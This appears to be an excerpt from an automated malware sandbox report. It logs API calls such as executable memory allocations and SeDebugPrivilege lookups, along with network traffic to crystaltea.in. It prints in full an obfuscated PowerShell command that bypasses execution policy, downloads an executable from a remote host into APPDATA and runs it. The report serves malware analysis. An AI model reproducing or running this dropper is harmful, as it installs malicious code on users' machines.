allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
cmdline powershell.exe -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data sent pldZŽ³Æï ȼ‡‰„ÕèçxYÏÖV|ÛÞD„R6i/5 ÀÀÀ À 28+ÿ crystaltea.in  
Data sent pldZN ×½”P‹†SëLçrÀþõ¿WàZ"`zEÔ=2/5 ÀÀÀ À 28+ÿ crystaltea.in  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: pldZŽ³Æï ȼ‡‰„ÕèçxYÏÖV|ÛÞD„R6i/5 ÀÀÀ À 28+ÿ crystaltea.in  
socket: 1436
sent: 117
1 117 0

send

buffer: pldZN ×½”P‹†SëLçrÀþõ¿WàZ"`zEÔ=2/5 ÀÀÀ À 28+ÿ crystaltea.in  
socket: 1436
sent: 117
1 117 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\098.exe
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy